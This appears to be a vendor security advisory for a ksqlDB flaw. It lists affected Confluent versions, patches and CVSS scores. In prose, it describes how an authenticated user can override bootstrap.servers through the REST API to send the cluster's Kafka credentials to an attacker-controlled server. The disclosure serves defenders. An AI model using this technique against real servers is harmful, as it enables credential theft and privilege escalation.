Impacted versions:
- Confluent Platform < 8.2.1, 8.1.3, 8.0.5, 7.9.7, 7.8.8, 7.7.9, 7.6.11, 7.5.14, 7.4.15
- Confluent Cloud ksqlDB managed clusters
Recommended action:
- Confluent Cloud customers do not need to take any action. Confluent has patched all impacted ksqlDB managed clusters.
- Confluent Platform customers should upgrade to the latest patched release versions.
Issue:
ksqlDB allows authenticated users to override internal Kafka producer configuration through REST API requests, enabling exfiltration of the cluster's Kafka credentials to an attacker-controlled server.
ksqlDB permits users to supply configuration properties alongside REST API requests. Due to missing validation, user-supplied Kafka producer properties — including bootstrap.servers are applied to the server's internal Kafka producer. An authenticated user with privileges to submit ksqlDB queries can redirect this producer to an attacker-controlled Kafka endpoint, causing ksqlDB to transmit its internal Kafka credentials during the connection handshake.
Impact
The Kafka credentials used by ksqlDB clusters are typically configured by customers when provisioning the ksqlDB cluster and are used to access the underlying Kafka cluster. Customers are expected to scope these credentials to the least privileges required for ksqlDB operations.
If a customer has configured Kafka credentials with elevated privileges, an authenticated user able to override bootstrap.servers can exfiltrate those credentials and use them to perform unauthorized actions against the underlying Kafka cluster outside of ksqlDB, potentially escalating privileges beyond what the ksqlDB authorization model permits.
As a defense-in-depth measure, customers should review the privileges granted to the Kafka credentials configured for ksqlDB clusters and ensure they follow least-privilege principles.
Remediation:
-
Confluent Platform:
- This issue is resolved in the following versions of Confluent Platform: 8.2.1, 8.1.3, 8.0.5, 7.9.7, 7.8.8, 7.7.9, 7.6.11, 7.5.14, 7.4.15.
-
Confluent Cloud:
- Confluent Cloud managed clusters have already been patched and no further action is necessary.
CVSS Scores:
-
Confluent Cloud:
- CVSS: 6.6 (CVSS v3.1 Calculator)
-
Confluent Platform:
- CVSS: 5.9 (CVSS v3.1 Calculator)